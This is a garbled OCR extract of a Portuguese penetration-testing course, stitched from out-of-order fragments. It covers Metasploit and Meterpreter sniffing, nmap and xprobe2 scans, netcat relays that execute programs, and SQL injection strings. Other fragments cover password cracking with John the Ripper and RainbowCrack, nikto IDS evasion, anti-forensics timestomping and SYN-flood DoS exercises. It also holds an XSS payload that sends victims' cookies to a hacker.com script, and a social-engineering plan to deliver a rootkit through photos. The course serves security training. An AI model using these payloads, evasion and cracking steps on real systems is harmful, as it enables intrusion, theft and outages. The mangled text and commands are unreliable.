4Linux - 507 Pen test (+Atualizado 2011_Completa)
Contents
1. ES gt use sniffer Em seguida pedimos para listar as interfaces de rede com o comando sniffer interfaces gt sniffer_interfaces Iremos iniciar nosso sniffer nesta interface indicada pelo n mero 1 com o comando sniffer start 1 podemos esperar o tempo que acharmos conveniente i l gt sniffer_start 1 meterpreter gt use sniffer Loading extension sniffer success meterpreter gt sniffer interfaces 1 AMD PCNET Family PCI Ethernet Adapter type 0 mtu 1514 usable true dhcp true wifi false meterpreter gt sniffer start 1 Capture started on interface 1 50000 packet buffer meterpreter gt sniffer dump 1 tmp sniffer cap Flushing packet capture buffer for interface 1 Flushed 2828 packets 1794096 bytes Downloaded 029 524288 1794096 Downloaded 0 1048576 1794096 Downloaded 087 1572864 1794096 Downloaded 100 1794096 1794096 Download completed converting to PCAP PCAP file written to tmp sniffer cap meterpreter gt sniffer stop 1 Capture stopped on interface 1 meterpreter gt Vejamos algumas informacoes sobre o arquivo sniffer cap usando o capinfos gt capinfos sniffer cap Cap tulo 19 Metasploit Framework 235 capinfos sniffer cap File name sniffer cap File type Wireshark tcpdump Libpcap File encapsulation Ethernet Number of packets 2828 File size 1782808 bytes Data size 1737536 bytes2. E xprobe2 www 4linux com br Agora tente utilizar o fingerprint sobre uma porta aberta s xprobe2 p tcp 80 open 66 118 142 41 Percebe se que quanto maior o n mero de informa es que passamos para o xprobe2 maior a precis o no reconhecimento do Sistema Operacional do alvo 5 13 Contramedidas e Configurar as aplica es instaladas nos servidores atentando para as informa es que elas exibem durante as requisi es e Configurar corretamente as regras de firewall para bloquear requisi es maliciosas e Ter cuidado com as informa es publicadas na WEB e Configurar corretamente o arquivo robot txt para que diret rios com arquivos sens veis n o sejam indexados pelos sistemas de busca 5 14 Pr tica dirigida 1 Fa a uma varredura no servidor da 4Linux usando a ferramenta dnsenum 2 Identifique na internet um arquivo robots txt 3 Identifique a vers o do sistema operacional de um servidor local da rede utilizando o nmap e xprobe2 Cap tulo 5 Levantamento de Informa es 71 4 Utilizando a ferramenta pOf identifique o sistema operacional de m quinas existentes na rede local Cap tulo 5 Levantamento de Informa es 72 Cap tulo 6 Entendendo a Engenharia Social e o No Tech Hacking 6 1 Objetivos e Entender o que Engenharia Social e Entender o Dumpster Diving e Entender os riscos associados a Engenharia Social e Entender as t cnicas
3. Uso como scanner n nc wv 127 0 0 1 22 25 10 6 3 Encadeando Netcats Netcat foi desenvolvido para trabalhar com um pipeline ent o naturalmente a sa da de uma inst ncia do Netcat pode alimentar a entrada de outro Abaixo segue uma maneira de enviar um arquivo de log de um host para outro atrav s de um intermedi rio 3 host3 nc 1 gt log txt host2 nc l sh exec ncat host3 host1 nc send only host2 lt log txt Cap tulo 10 Trojans Backdoors V rus Rootkits e Worms 125 O Netcat em modo de escuta no host2 ao receber uma conex o cria um novo netcat para falar com o host3 e conecta a entrada e sa da do programa em execu o no hostil e host3 encadeando os Esse mesmo macete pode ser utilizado em um host local tamb m O exemplo a seguir direciona a porta 8080 para o servidor web exemplo org br E nc l localhost 8080 sh exec ncat exemplo org br 80 10 7 Keylogger Keylogger s o programas utilizados para gravar tudo aquilo que o usu rio digita no teclado Alguns mais avan ados armazenam screenshots da tela ou at mesmo a rea ao redor do ponteiro do mouse onde ocorre um click Exemplos de Keyloggers e Ardamax Windows e Pykeylogger Linux http sourceforge net projects pykeylogger files Al m dos keyloggers l gicos temos os keyloggers f sicos que podem ser comprados em lojas virtuais por poucos d lares Cap tulo
4. or a a or a a or 1 Cap tulo 13 Vulnerabilidades em aplica es web 161 13 4 4 Cross Site Scripting XSS Cross site scripting XSS um tipo de vulnerabilidade de seguran a tipicamente encontrada em aplica es web que permite inser o de c digos por usu rios web maliciosos dentro das paginas vistas por outros usu rios Exemplos de c digo incluem HTML Java Script e outros client side scripts Uma das formas mais comum de explorar esse tipo de falha inserir um formul rio web no site vulner vel para tentar roubar informa es de pessoas que o atacante enviou esse site vulner vel Outro t pico ataque tamb m visa roubar os dados do cookie do usu rio enviando as informa es para um servidor do atacante Exemplo de uma vulnerabilidade usando as Query Strings de uma p gina tw http dominio com default aspx parametro lt script gt alert Ol 204Linux lt script gt Se obtiverem a mensagem JavaScript Ola 4Linux estaremos perante uma falha de seguran a Tamb m podemos roubar um cookie de uma pessoa Vejamos o seguinte exemplo tw lt script gt document location http www hacker com cgi bin cookie cgi 20 document cookie lt script gt Quando o navegador da v tima abrir este Java Script injetado o seu cookie ser enviado para o site do atacante XSS tamb m amplamente usado para Phishing na tentativa de dar mais
5. 888 888 d8b888 888 888 Y8P888 888 888 888 88888b d88b d88b 888888 8888b d8888b 88888b 888 d88b 888888888 888 88bd8P Y8b888 88 b88K 888 88b888d88 88b888888 888 88888888888888 d888888 Y8888b 888 888888888 888888888 888 888Y8b Y88b 888 888 X88888 d88P888Y88 88P888Y88b 888 Y8888 Y888 Y888888 88888P 88888P 888 Y88P 888 Y888 888 888 888 metasploit v3 5 1 dev core 3 5 api 1 0 636 exploits 320 auxiliary 215 payloads 27 encoders 8 nops svn r11164 updated today 2010 11 29 Cap tulo 19 Metasploit Framework 247 19 13 2 Varrendo com o Armitage Para selecionar uma varredura que queiramos executar precisamos expandir a lista de m dulos e dar um duplo clique na varredura que desejamos utilizar nesse caso smb version e configurar o range de alvos na op o RHOSTS Outra op o para varredura clicar no menu Hosts gt MSF Scans e definirmos o range da rede que ser varrida em busca de alvos Ou adicionar um host espe fico em Hosts gt Add Hosts Armitage View Hosts attacks Workspaces Help gt pop3 5 portscan gt postgres rogue rservices gt Gsip v smb pipe_auditor pipe dcerpc auditor smb2 smb enumshares smb enumusers smb login smb lookupsid Display version information about each system B smb version gt E smt p Option 4 Value gt snmp ssh 192 168 1 200 254 os SMBDomain WORKGROUP k St tolon
6. Se compararmos a sa da do site com a sa da do comando whois veremos que o resultado id ntico importante saber que para cada regi o do mundo inteiro h organiza es respons veis pelo registro de dom nios acima das organiza es respons veis pelos registros em cada pa s No quadro abaixo temos o nome e o endere o das organiza es respons veis em cada parte do globo pelo gerenciamento e libera o de dom nio incluindo o grupo de IPs para cada regi o Registry Acronym Registry Name Web Site ARIN American Registry for Internet Numbers www arin net RIPE R seaux IP Europ ens www ripe net APNIC Asia Pacific Network Information Centre www apnic net AFRINIC African Network Information Centre www afrinic net LACNIC Latin America amp Caribbean Network www lacnic net Information Centre 5 5 Consultando servidores DNS Como sabemos os servidores DNS s o respons veis por traduzir os nomes can nicos de um dom nio para o seu respectivo endere o IP Sendo assim um servidor DNS conhece todos servidores que est o acess veis atrav s da rede p blica Vamos consult lo ent o a dig t MX 4linux com br dig t NS 4linux com br Os campos MX e NS fornecem respectivamente o nome dos servidores de e mail e o nome de todos os servidores de DNS Cap tulo 5 Levantamento de Informa es 59 Com essa consulta j conseguimos inclusive endere os de servidores que ut
7. Agora podemos executar o John referenciando o nosso arquivo password E john password Loaded 5 passwords with 5 different salts FreeBSD MD5 32 32 x x x teste abc teste1 12345 sb Tamb m podemos passar na sintaxe um parametro para que o John pegue a lista de palavras de outro arquivo por exemplo as wordlists que geramos anteriormente Cap tulo 12 T cnicas de For a Bruta 143 x john wordfile tmp juniorlist password O John gera dois arquivos de log o john pot e o restore No primeiro arquivo est o as senhas j decifradas para que em uma nova execu o ele n o comece tudo do zero J o arquivo restore ir conter informa es sobre o estado de execu o do John para continuar executando uma sess o interrompida por exemplo quando teclamos CTRL C durante a execu o Se voc quiser retomar a execu o do ponto onde parou basta executar john restore Tamb m podemos exibir as senhas ja descobertas pelo programa usando a op o show a john show arquivo passwd importante ressaltar que o John The Ripper possui m dulos adicionais que n o s o compilados durante uma compila o padr o Esses m dulos podem ser encontrados no pr prio site da ferramenta atrav s do endere o http www openwall com john Os m dulos adicionais se encontram no final da p gina inicial Como exemplo pode
8. nmap v sS P0 p n max retries 3 max rtt timeout 1250 min parallelism 100 oA lt output file gt lt net block gt min hostgroup 100 nmap vv p lt open port list gt sT A P0 n min hostgroup 100 max rtt timeout 1250 min parallelism 100 oA lt output file gt iL liveIPList Cap tulo 21 Desafios Testes de Invas o 272 Segundo Anexo Op es do NetCat Fundamentals Fundamental Netcat Client S nc TargetIPaddr port Connect to an arbitrary port port at IP Address TargetlPaddr Fundamental Netcat Listener nc 1 p LocalPort Create a Netcat listener on arbitrary local port LocalPort Both the client and listener take input from STDIN and send data received from the network to STDOUT File Transfer Push a file from client to listener nc 1 p LocalPort gt outfile Listen on LocalPort store results in outfile nc w3 TargetIPaddr port lt infile Push infile to TargetlPaddr on port Pull file from listener back to client nc 1 p LocalPort lt infile Listen on LocalPort prep to push infile S nc w3 TargetIPaddr port gt outfile Connect to TargetIPaddr on port and retrieve outfile TCP Port Scanner Port scan an IP Address nc v n z wl TargetIPaddr start port end port Attempt to connect to each port in a range from end port to start port on IP Address TargetlPaddr running verbosely
9. E l nikto pl update nikto pl h 192 168 131 1 o 192 168 131 1 txt Podemos adicionar o sinalizador de evas o que tenta contornar seus sistemas de IDS E perl nikto pl h www xyz com br evasion 1 Existem 9 op es diferentes para flags de evas o 1 para Random URL encoding non UTF8 O processo f cil e descomplicado de instala o de uma plataforma LAMP Linux Apache MySQL PHP permite a banaliza o de servidores web na internet configurados com vistas apenas a funcionalidade sem considerar quest es relativas seguran a A inseguran a do servidor web n o depende exclusivamente de falhas de configura o ou vulnerabilidades de software muitas vezes os pr prios usu rios webmasters comprometem a seguran a dos servi o Quem da rea com certeza j deparou se com arquivos do tipo site zip senhas txt largados Cap tulo 16 Ataques a Servidores WEB 194 no public html Muitos acham que pelo fato do diret rio possuir Indexes desativar listagem de arquivos o arquivo est seguro BESTEIRA pensar assim ainda mais se o arquivo possui nome bem conhecido webservers scanner adoram procurar esses arquivos O nikto permite a realiza o de diversos testes vale uma olhada no diret rio docs e uma lida no help E nikto pl Help less 16 5 Auditoria e Explora o de Web Servers com W3AF Ww sof Web Applicatio
10. e Para sistemas NT dever o estar em winn repair Sam 12 12 Contramedidas Uma boa pol tica de senhas de forma a garantir que e Senhas s o trocadas periodicamente e Asenha deve ter no m nimo 8 caracteres e A senha deve ser complexa com caracteres especiais letras e n meros e A mesma senha n o pode ser usada dentro de um per odo m nimo Cap tulo 12 T cnicas de For a Bruta 155 Cap tulo 13 Vulnerabilidades em aplica es web 13 1 Objetivos e Entender o funcionamento das aplica es web e Aprender a explorar as principais classes de vulnerabilidades em aplica es web existentes na atualidade Cap tulo 13 Vulnerabilidades em aplica es web 156 13 2 Entendendo a aplica o web Aplica es web s o programas que ficam em um servidor web e executam tarefas para dar uma resposta ao usu rio Webmails web f runs e blogs s o exemplos de aplica es web Uma aplica o web usa uma arquitetura cliente servidor normalmente com um navegador web como cliente e o web server como o servidor da aplica o O objetivo de tentar explorar uma aplica o web ganhar acesso a informa es confidenciais Aplica es web s o cr ticas para a seguran a de um sistema porque usualmente elas est o conectadas com uma base de dados que cont m informa es tais como cart es de cr dito e senhas Exemplos e Webmails e web f runs Blogs Lojas virtuais 13 3 Por que t o peri
11. para reduzir drasticamente o tempo necess rio para quebrar senhas Um timo programa para utilizarmos para quebrar senhas Windows com rainbow tables o Ophcrack 3 aptitude install ophcrack Cap tulo 12 T cnicas de For a Bruta 147 Outro programa que quebra inclusive hashs MD5 SHA1 SHA2 e etc o Cain que roda em Windows e Para baixar Rainbow Tables http rainbowtables shmoo com e Para entender mais http www ethicalhacker net content view 94 24 12 9 Utilizando o Rainbow Crack para cria o de Rainbow Tables 12 9 1 Introdu o RainbowCrack uma ferramenta cujo objetivo quebrar hash de senhas O m todo utilizado pela ferramenta o brute force Nesse m todo todas as senhas em texto plano e seus hashs correspondentes s o computados um por um O hash computado comparado com o hash alvo Se um deles for igual a senha em texto plano encontrada Do contr rio o processo continua at finalizar todas as senhas poss veis No m todo time memory a tarefa de computar hashs feita atrav s do armazenamento dos resultados no que chamamos de rainbow table Depois disso os hashes podem ser acessados a partir das rainbow tables sempre que necess rio O processo pr computacional precisa de muito tempo para criar as chaves que ser o posteriormente utilizadas No entanto uma vez que esse processo tenha terminado a performance da rainbow tables pode ser de centenas a
12. Aqueles que se sentem confort veis com o Windows tem o prazer de saber Cap tulo 19 Metasploit Framework 215 que a instala o do Metasploit n o tem grandes segredos Para esta ltima vers o os desenvolvedores do Metasploit surpreendem nos com um simp tico assistente que ir guiar nos atrav s da implementa o de um ambiente personalizado Cygwin seguida pela instala o e configura o do pr prio Framework Assim apenas o download e a execu o de um nico arquivo chamado framework 3 4 0 exe nos permitir em apenas alguns momentos o acesso ao console Metasploit e desfrutar de todas as suas ferramentas Se pelo contr rio a sua decis o pelo Unix Linux voc pode fazer o download da vers o mais recente para esta plataforma comprimida e de denomina o framework 3 5 1 linux i686 run Q http updates metasploit com data releases framework 3 5 1 linux i686 run Ap s ter feito isso precisa apenas dar permiss o de execu o ao arquivo e execut lo com o comando 5 chmod 755 framework 3 5 1 linux i686 run framework 3 5 1 linux i686 run Embora seja verdade que com o que aconteceu at agora suficiente para se familiarizar com o produto se sua inten o a de obter todo o proveito dessa ferramenta provavelmente quer ter a certeza que tenha instalado o m dulo Perl chamado Net SSLeay e se n o for esse o caso proceda sua instala o aproveitando q
13. Exclude list from file HOST DISCOVERY sL List Scan simply list targets to scan sP Ping Scan determining if host is online PO Treat all hosts as online skip host discovery PS portlist TCP SYN discovery to given ports PA portlist TCP ACK discovery to given ports PU portlist UDP discovery to given ports PE ICMP echo request discovery probes PP timestamp request discovery probes PM netmask request discovery probes n R Never Always resolve DNS default sometimes dns servers lt servl serv2 gt Specify custom DNS servers system dns Use OS s DNS resolver SCAN TECHNIQUES sS TCP SYN Scan sT Connect Scan sA ACK Scan sW Windows Scan sM Maimon scan sN TCP Null scan sF FIN Scan sX Xmas Scan scanflags lt flags gt Customize TCP scan flags sI lt zombie host probeport gt Idlescan sO IP protocol scan b lt ftp relay host gt FTP bounce scan PORT SPECIFICATION AND SCAN ORDER p lt port ranges gt Only scan specified ports F Fast Scan only ports listed in nmap services file r Scan ports consecutively don t randomize SERVICE VERSION DETECTION sV Probe open ports determine service version info version intensity lt level gt Set from 0 light to 9 try all probes version light Limit to most likely probes intensity 2 version all Try every single probe intensity 9 version trace Show detailed version scan activity for de
14. es espec ficas do m dulo com o comando info lt module name gt Plugins Podem ser comparados aos m dulos no sentido de trazer fun es extras ao framework Para o iniciante importante saber a diferen a entre exploit e payload Exploit a explora o da falha em si que permite ao explorador fazer alguma coisa O payload a coisa que ser feita Um comando a ser executado um shell etc O Metasploit conta ainda com outras tecnologias como por exemplo a evas o de Intrusion Detection Systems IDS e Intrusion Prevention Systems IPS tornando a vida dos detectores de intrus o mais dif cil Atualmente os IDSs e IPSs ainda tem muitos problemas e certamente ainda est o longe de uma funcionalidade Cap tulo 19 Metasploit Framework 220 considerada ideal e robusta O Metasploit pode servir para auditar essas ferramentas Existem varias classes que podem ser usadas para evadir os detectores de intrus o TCP max send size TCP send delay HTTP chunked HTTP compression SMB pipe evasion DCERPC bind multi DCERPC alter context entre outros Outra tecnologia que merece destaque o Metasploit anti forensics chamada de MAFIA Metasploit Anti Forensic Investigation Arsenal O MAFIA constitu do basicamente das ferramentas e Timestomp Usado para modificar os arquivos do sistema de arquivo New Technology File System NTFS Pode se modificar os valores de quando os arquivos foram criados delet
15. o fato de que ela baseada tanto em GPL v2 como um Perl Artistic License permitindo a sua utiliza o em projetos Open Source assim como em projetos comerciais O principal objetivo do MSF criar um ambiente de pesquisa desenvolvimento e explora o de vulnerabilidades de software fornecendo as ferramentas necess rias para o ciclo completo da pesquisa que pode ser divido basicamente em e Descoberta da vulnerabilidade Onde o pesquisador descobre um erro de programa o que pode levar ou n o a uma brecha de seguran a e An lise Onde o pesquisador analisa a vulnerabilidade para determinar quais as maneiras pela qual a mesma pode ser explorada Perguntas chave s o feitas nessa fase do desenvolvimento como por exemplo De qual maneira a vulnerabilidade pode ser explorada Localmente ou remotamente Entre outras dezenas mais e Desenvolvimento do exploit Depois de respondidas as perguntas da fase de an lise come a o desenvolvimento da explora o em si como Cap tulo 19 Metasploit Framework 214 prova da exist ncia real da vulnerabilidade T cnicas de engenharia reversa programa o debugger etc s o usadas nessa fase e Teste do exploit Nessa fase o exploit testado em diferentes ambientes e vari veis service packs patchs etc O exploit em si a prova definitiva que a vulnerabilidade pode ser explorada Desde a consolida o do Metasploit Framework a compara o com produtos co
16. para listar os daemons do hunt e selecione a op o A de arp spoof O hunt pedir para configurarmos os endere os IP de origem e destino pelos quais queremos fazer ARP Spoofing e depois digite S para iniciar o Daemon Cap tulo 9 Testando o sistema 116 Essa parte pode demorar bastante mas basta ter calma Ap s terminar tudo volte ao menu principal e apenas digite A de arp simple hijack Escolha a conex o desejada e o resto voc s j sabem 9 9 Contramedidas Infelizmente n o existe muito o que fazer para prevenir esse tipo de ataque quando estamos falando de ataques que envolvem inunda o de pacotes Normalmente vence quem tem mais link Por m DoS causados por falhas em aplica es podem ser evitadas com treinamento sobre programa o segura para os programadores Apesar de n o existir nenhum meio que consiga impedir totalmente um ataque Dos poss vel detectar a presen a de ataques ou de computadores zumbis de uma rede que est o participando de um DDoS Para isso basta observar se est havendo mais tr fego do que o normal principalmente em casos de sites seja ele um menos conhecido seja ele um muito utilizado como o Google com se h pacotes TCP e UDP que n o fazem parte da rede ou se h pacotes com tamanho acima do normal Outra dica importante utilizar softwares de IDS Intrusion Detection System Sistema de Identifica o de Intrusos Para preven o
17. poss vel estender para al m a capacidade de explora o de seus ataques e Qualquer sistema vulner vel a XSS est vulner vel a XSRF Como XSS pode servir de suporte para lan ar ataques do tipo CSRF toda aplica o que vulner vel ao primeiro pode ser explorada pelo segundo tipo de ataque e Nem toda aplica o vulner vel a XSRF est tamb m vulner vel a XSS poss vel utilizar filtros para minimizar ataques XSS mas nem sempre esses filtros conseguem barrar entradas maliciosas que utilizam outras metodologias para lan ar um ataque CSRF Portanto se a aplica o est protegida de XSS n o se pode confiar que tamb m esteja protegida de CSRF e Permite alterar as informa es enviadas ao navegador Permite ir al m dos ataques de XSS manipulando os par metros que s o Cap tulo 13 Vulnerabilidades em aplica es web 163 enviados ao navegador alterando a resposta do mesmo para a v tima e Ataque client side N o afeta diretamente o servidor que pode nem mesmo detectar que est sendo alvo de um ataque pois as entradas maliciosas podem ser confundidas com entradas v lidas vinda do cliente acessando a aplica o e N o se baseia em executar c digo JS Enquanto o XSS baseia se em execu o de c digo javascript o tipo de ataque CSRF n o limita se isso pois pode manipular entradas par metros manipulados pela aplica o e etc e Baseia se em enviar requisi es com as credenciais do usu
18. utilizar o shells JSHELL Apenas tenta quebrar as senhas dos usu rios cujas shells sejam iguais que foi especificada por voc na linha de comando Utilizando o voc ignora as shells especificadas salts JNUMERO Deixa voc especificar o tamanho das senhas que ser o ou n o testadas Aumenta um pouco a performance para quebrar algumas senhas por m o tempo total utilizando esta op o acaba sendo o mesmo Cap tulo 12 T cnicas de For a Bruta 142 e format FORMATO Permite a voc definir o algoritmo a ser usado para quebrar a senha ignorando a detec o autom tica do software Os formatos suportados atualmente s o DES BSDI MD5 AFS e LM Voc tamb m pode utilizar esta op o quando estiver utilizando o comando test como j foi explicado anteriormente neste texto e save memory 1 2 ou 3 Esta op o define alguns n veis para dizer ao John com qual n vel de otimiza o ele ir utilizar a mem ria Os n veis variam de 1 a 3 sendo 1 a m nima otimiza o Esta op o faz com que o JtR n o afete muito os outros programas utilizando muita mem ria 12 5 3 USANDO A FERRAMENTA Para executar o John sobre arquivos de senha de Linux teremos que passar para ele as senhas est o utilizando o esquema de shadow no sistema Para isso utilizaremos o execut vel unshadow que esta presente junto com o John z unshadow etc passwd etc shadow gt password
19. 0 0 Ou start 0 Cap tulo 9 Testando o sistema 105 goto s 9 3 2 Pr tica dirigida o C4 O C4 uma ferramenta que gera ataques de DoS em redes locais com SYN Flood Vamos conhec la um pouco mais digitando no terminal c4 Com esse comando teremos como retorno a sintaxe e a explicacao resumida dos par metros e op es do comando c4 A sintaxe correta para um ataque de SYN Flood com o c4 contra um host espec fico Sintaxe c4 h ip alvo E alguns dos par metros existentes s o Par metros h destination ip host p destination port range start end defaults to random t attack timeout defaults to forever 1 of box link to use defaults to 100 Vamos formar duplas e realizar ataques de DoS na m quina do companheiro de exerc cio Cuidado pois esse ataque pode travar a m quina do companheiro e at mesmo a sua 9 4 DDoS O DDos sigla para Distributed Denial of Service um ataque DoS ampliado ou seja que utiliza at milhares de computadores para atacar um determinado alvo Cap tulo 9 Testando o sistema 106 Esse um dos tipos mais eficazes de ataques e j prejudicou sites conhecidos tais como os da CNN Amazon Yahoo Microsoft e eBay Para que os ataques do tipo DDoS sejam bem sucedidos necess rio que se tenha um n mero grande de computadores para fazerem parte do ataque Uma das melhores formas encontrada
20. Atrav s do MSN enviar fotos ou videos com rootkit moto configurado anteriormente eradas pelo Keylogger Encontrar exploit especifico Usar Metasploit Descobrir falha de SO ou progs 8 9 Pr tica dirigida 1 Vamos em primeiro lugar instalar o software necess rio para a cria o de mapas mentais 3 aptitude install freemind Cap tulo 8 Enumera o de informa es e servi os 100 2 Utilizando as informa es reunidas at o momento vamos definir os vetores de ataque classific los e criar um mapa mental com os mesmos 3 Acrescente isso ao relat rio 8 10 Contramedidas e Como a maioria das varreduras e aplicativos de mapeamento utilizam flags de conex o uma boa configura o de regras do firewall j bloqueia a maiorias das tentativas de varreduras e Manter IDS IPS bem configurados para detectar e bloquear IPs que realizam tentativas de varreduras e Realizar constantemente auditorias nas regras de IDS IPS e firewalls testando se os mesmos podem ser burlados e como E a partir disso criar e ou adaptar regras Cap tulo 8 Enumera o de informa es e servi os 101 Cap tulo 9 Testando o sistema 9 1 Objetivos e Entender como ocorrem ataques de nega o de servi o e Entender o que DoS DDoS e DRDoS e Entender o que e como realizar sequestro de sess o Cap tulo 9 Testando o sistema 102 9 2 O que nega o de servi o Quem
21. Cap tulo 12 T cnicas de For a Bruta 151 e md5 loweralpha numeric 1 7 O 3800x33554432 O rt 512MB e md5 loweralpha numeric 1 7 1 3800x33554432 O rt 512MB e md5 loweralpha numeric 1 7 2 3800x33554432 O rt 512MB e md5 loweralpha numeric 1 7 3 3800x33554432 O rt 512MB e md5 loweralpha numeric 1 7 4 3800x33554432 O rt 512MB e md5 loweralpha numeric 1 7 5 3800x33554432 O rt 512MB Agora 0 processo de criacao da rainbow table esta completo 12 9 3 Passo 2 usar o rtsort para organizar as rainbow tables As rainbow tables geradas pelo programa rtgen precisam de um p s processamento para tornar sua consulta mais f cil e r pida O programa rtsort utilizado para organizar todas as rainbow chains em uma rainbow table Utilize os seguintes comandos rtsort md5_loweralpha numeric 1 7 O 3800x33554432 O rt rtsort md5 _loweralpha numeric 1 7 1 3800x33554432 O rt rtsort md5_loweralpha numeric 1 7 2 3800x33554432 O rt rtsort md5 _loweralpha numeric 1 7 3 3800x33554432 O rt rtsort md5_loweralpha numeric 1 7 4 3800x33554432 O rt rtsort md5 _loweralpha numeric 1 7 5 3800x33554432 O rt Cada comando acima leva cerca de 1 a 2 minutos para completarem sua execu o O programa rtsort gravar a rainbow table organizada por sobre o arquivo orginal N o interrompa a execu o do comando do contr rio o arquivo original ser danificado Agora o processo de organiza o das rainbow tables est completo Cap t
22. Esta varredura explora o comportamento padr o da RFC 792 De acordo com ela um pacote marcado com a flag FIN deve causar como resposta um pacote com a flag RST para portas que estejam fechadas e devem ser descartados se a porta estiver aberta Devido a esta caracter stica os resultados ser o e Open Filtered Aberta e ou filtrada por firewall e Closed Filtered Fechada e ou filtrada por firewall Varredura Nula E nmap sN 192 168 0 173 Alguns sistemas operacionais que n o seguem a RFC estritamente podem dar respostas diferentes do esperado Sabendo deste comportamento podemos enviar um pacote sem nenhum conte do e ent o observar a resposta do alvo As respostas podem variar de sistema operacional para sistema operacional mas geralmente recebemos e Open Filtered Aberta e ou filtrada por firewall e Closed Fechada Varredura para identifica o de firewalls E l nmap sA 192 168 0 173 O objetivo desta varredura mapear as regras de um firewall para determinar se o mesmo faz tratamento completo de conex o ou n o Cap tulo 7 Varreduras ativas passivas e furtivas de rede 87 Os nicos resultados neste tipo de varredura s o e Filtered A porta est protegida por firewall e Unfiltered A porta n o est protegida por firewall 7 7 Tunelamento O tunelamento basicamente a t cnica de encapsular conjuntos de dados que trafegam em rede dentro de outro c
23. Guest 501 a296c9e4267e9ba9aad3b435b51404ee 9d978dda95e5185bbeda9b3aec00f84b4 O arquivo pwdump a sa da de utilit rios tais como pwdump2 pwdump3 ou outros E cont m os hashes tanto Im quant ntlm Cap tulo 12 T cnicas de For a Bruta 153 Para quebrar hashes Im em arquivos pwdump use o seguinte comando E rcrack rt f arquivo pwdump O algoritmo de hash Im converte todas as letras min sculas em strings mai sculas como resultado disso todas as strings quebradas atrav s do hashe Im nunca cont m letras min scula enquanto que a string original poed conter letras min sculas O programa rcrack tentar corrigir isso em hashes ntlm armazenados no mesmo arquivo e exibir a string original 12 10 Pr tica dirigida 1 Utilizando o arquivo shadow passado pelo instrutor vamos executar o John The Ripper para quebrar as senhas 2 Com o THC Hydra vamos executar ataques de for a bruta contra um servidor SSH existente na rede alvo 12 11 OSSTMM Recomenda e Ataque automatizado de dicion rio a pasta de senhas e Ataque de for a bruta a pasta de senhas e Ataque de for a bruta em servi os e Obter a pasta de senhas do sistema que guarda nomes de usu rio e senha e Para sistemas Unix dever o estar em etc passwd e ou etc shadow e Para sistemas Unix que realizam autentica es SMB pode encontrar as Cap tulo 12 T cnicas de For a Bruta 154 senhas de NT em etc smbpasswd
24. Vamos utilizar um programa espec fico para isso e com a reuni o das informa es conseguidas at o momento definirmos os vetores de ataque Devemos atentar que ao longo do curso novos vetores ser o acrescentados e alterados de acordo com a evolu o de nosso conte do Vejamos abaixo um exemplo de mapa mental com vetores de ataque definidos O identificar se h rede arcano austrarcipiopata O sniffing mapear Rede O Estalar privil gios Acessa Wi Fi LO identificar criptografia K Acesso local Reconhecimento da estrutura f sica ataque f sico o Entr mpre ieee Arrombamento Acesso f sico aos computadores a Tailgating Acesso f sico aos computadores Disparar alarme de inc ndio Acesso fisico aos computadores ___________ obtere mails Contato com funcion rio Engenharia Social E E O Enviar e mails Utilizar informa es coletadas Espetar laptop no switch da rede Configurar acesso remoto no servidor Marcar visita t cnica acesso f sico aos computadores Espetar laptop no Swich aa ede E a Instalar keylogger l gico Instalar keylogger f sico Obter acesso como root Buffer Overfow a a s Nega o de Servi o Flood Dano F sico Utilizar informag letadas no Dumpster Diving 5 i TT Enviar e mail com fotos ou videos da mulher junto com rootkit Acesso Remoto K ontratar uma mulher para entrar em contato com algum funcion rio na feira
25. gt relay bat C gt nc PreviousHopIPaddr port e relay bat Create a relay that will send packets from the connection to PreviousHopIPaddr on port port to a Netcat Client connected to NextHoplPaddr on port port2 Netcat Command Flags nc options TargetIPaddr port s The TargetlPaddr is simply the other side s IP address or domain name It is required in client mode of course because we have to tell the client where to connect and is optional in listen mode Listen mode default is client mode L Listen harder supported only on Windows version of Netcat This option makes Netcat a persistent listener which starts listening again after a client disconnects u UDP mode default is TCP p Local port In listen mode this is port listened on In client mode this is source port for all packets sent e Program to execute after connection occurs connecting STDIN and STDOUT to the program n Don t perform DNS lookups on names of machines on the other side z Zero I O mode Don t send any data just emit a packet without payload wN Timeout for connects waits for N seconds after closure of STDIN A Netcat client or listener with this option will wait for N seconds to make a connection If the connection doesn t happen in that time Netcat stops running v Be verbose printing out messages on Standard Error such as when a connection occurs vv Be very verbose printing even more details on
26. navegador e Nessus ferramenta de varredura em busca de vulnerabilidades baseado em plugins constantemente atualizado escritos em NASL e Nikto ferramenta de busca de vulnerabilidades e falhas de configura o do Webserver Apache e IEWatch um plugin para o Microsoft Internet Explorer para analisar cabe alhos de requisi es HTTP e HTTPS al m de c digo fonte HTML e Wireshark sniffer de rede que possibilita a an lise de protocolos e filtro de pacotes a partir de regras personalizadas que trafegam na rede e Wapiti scanner de vulnerabilidade de aplica es web pesquisa falhas XSS inje o de SQL e XPath inclus es de arquivo local e remoto a execu o de comandos inje o LDAP e inje o CRLF e W3AF framework para auditoria e teste de invas o em aplica es web 13 6 Pr tica dirigida 13 6 1 Paros Proxy Primeiramente importante entender como a ferramenta Paros Proxy que usaremos em alguns exemplos funciona O Paros Proxy atua como um proxy local onde poss vel editar o conte do que est sendo requisitado para o proxy que no nosso caso o Paros antes de ser enviado em definitivo para o servidor web Isso poss vel pois ao clicar em algum link bot o ou acessar algum site estamos requisitando informa es para um servidor web Por m quando configuramos nosso navegador web Internet Explorer Firefox etc para usar proxy Cap tulo 13 Vulnerabilidades em
27. o de busca mais conhecida como localize o termo no texto da p gina Embora este operador possa parecer gen rico para ser utilizado de grande ajuda quando sabe que a string de busca apenas poder ser encontrada no texto da p gina Utilizar o operador allintext tamb m pode servir como um atalho para encontrar esta string em qualquer lugar exceto no title URL e links 4 3 5 site Direciona a pesquisa para o conte do de um determinado site Apesar de ser tecnicamente uma parte da URL o endere o ou nome de dom nio de um servidor pode ser mais bem pesquisada com o operador site Site permite que voc procure apenas as p ginas que est o hospedadas em um servidor ou dom nio espec fico 4 3 6 link Busca por links para uma determinada p gina Em vez de fornecer um termo de pesquisa o operador necessita de um link URL ou nome do servidor como um argumento 4 3 7 inanchor Localiza texto dentro de uma ncora de texto Este operador pode ser considerado um companheiro para o operador link uma vez que ambos buscam links O operado inanchor no entanto pesquisa a representa o de texto de um link n o o URL atual Inanchor aceita uma palavra ou express o como argumento como Cap tulo 4 Google Hacking 49 inanchor click ou inanchor 4linux Este tipo de pesquisa ser til especialmente quando come amos a estudar formas de buscar rela es entre sites 4 3 8 daterange Busca p
